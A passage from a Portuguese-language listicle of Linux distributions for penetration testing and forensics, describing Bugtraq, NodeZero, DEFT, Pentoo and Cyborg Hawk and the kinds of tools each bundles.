Bugtraq é mais uma empresa focada em segurança da informação. Eles também possuem um fórum onde trata sobre diversas questões relacionadas a vulnerabilidades, segurança, métodos de exploração, e como corrigi-las. Assim como as distros acima, o Bugtraq tem inúmeras ferramentas focadas a pentest.

Site: Bugtraq

7.Nodezero

Top 10: distros Linux para Hackers e Pentesters

NodeZero é baseado no Ubuntu, é um sistema completo que também pode ser usado para testes de penetração. NodeZero usa os repositórios do Ubuntu para que o seu sistema seja sempre atualizado. A configuração do sistema é fundamental e é destinada principalmente para a instalação e personalização do disco que você deseja. Com NodeZero vem cerca de 300 ferramentas para testes de penetração e um conjunto de serviços básicos que são necessários para testes de penetração.

Site: NodeZero

8.Deft

Top 10: distros Linux para Hackers e Pentesters

DEFT é uma distribuição focada em Computação Forense, com a finalidade de executar auditoria em dispositivos como (discos rígidos, pendrives, etc …) conectado ao PC. O sistema DEFT é baseado em GNU Linux, ele pode ser executado sem a necessidade de instalação (via DVDROM ou pendrive USB), ou executado como um Appliance Virtual VMware ou Virtualbox no. DEFT emprega LXDE como ambiente de desktop e wine para a execução de ferramentas do Windows no Linux. Dispõe de um Gerenciador de montagem de pacotes e gerenciamento de dispositivos.

Site: DEFT

9. Pentoo

Top 10: distros Linux para Hackers e Pentesters

O Pentoo é um Live CD com o foco na segurança da informação. Ela é baseada na distribuição Gentoo, e é caracterizada por possuir uma seleção bastante diversificada de ferramentas de segurança e testes de rede, desde escaneadores (scanners) até exploradores de vulnerabilidades (exploits). Existem duas versões do Live CD – Pentoo e MPentoo – que se diferem basicamente pelo fato do MPentoo utilizar unionfs e o gerenciador de janelas Enlightenment.

Site:  Pentoo

10. Cyborg Hawk

Top 10: distros Linux para Hackers e Pentesters

Cyborg Hawk Linux, uma distribuição para pentest (testes de penetração) baseada em Ubuntu, que conta com inúmeras ferramentas para Hackers Éticos e quem trabalha com Segurança Digital, Testes de Penetração e Análise Forense Digital, entre outras aplicações.

Análise de Vulnerabilidades
Toolkits de Exploitation
Escalação de Privilégios
Relatórios
Engenharia Reversa
Análise Forense
Ferramentas para Segurança Wireless
Ferramentas para RFID e NFC
Segurança em Dispositivos Móveis
Análise de Malware
Scanners de Rede
Análise de Pacotes

Site:  Cyborg Hawk


Fonte: http://www.arquivoti.net/2016/01/10-sistemas-operacionais-para-hackers-e-pentesters.html